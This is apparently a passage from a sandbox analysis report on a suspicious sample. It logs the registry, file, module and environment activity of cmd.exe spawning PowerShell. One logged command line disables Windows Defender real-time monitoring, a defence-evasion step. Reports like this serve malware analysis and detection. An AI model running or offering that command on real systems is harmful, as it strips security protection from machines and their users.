| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | os_pid = 0xf04, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4a830000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76b10000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76b624c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x76b4ac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76b53ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76b62732 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-24 06:58:23 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10897340 |
|
1 | |
| Get Time | type = Performance Ctr, time = 12040302238 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #12: powershell.exe
820
0
| Information | Value |
|---|---|
| ID | #12 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | powershell Set-MpPreference -DisableRealtimeMonitoring $true |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:46, Reason: Child Process |
| Unmonitor | End Time: 00:01:02, Reason: Self Terminated |
| Monitor Duration | 00:00:15 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf04 |
| Parent PID | 0xeec (c:\windows\system32\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
F08
0x
F20
0x
F24
0x
F28
0x
F2C
0x
F30
0x
8C8
0x
834
|
Host Behavior
File (394)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
2 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
6 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Users\2XC7u663GxWc | type = file_attributes |
|
1 | |
| Get Info | C:\ | type = file_attributes |
|
6 | |
| Get Info | C:\Windows\system32 | type = file_attributes |
|
7 | |
| Get Info | C:\Windows | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\Documents\WindowsPowerShell\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 4096 |
|
3 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 3315 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 781, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 4096 |
|
41 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 436 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 2530 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 542, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4096 |
|
5 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4018 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 78, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 2762 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 310, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 4096 |
|
17 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 3022 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 50, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 281 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 4096 |
|
62 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 3895 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 201, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 4096 |
|
21 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 3687 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 409, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 2228 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 844, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 3736 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 360, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 62 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 17 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 57 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 25 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 54 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
2 |
Registry (190)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
9 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
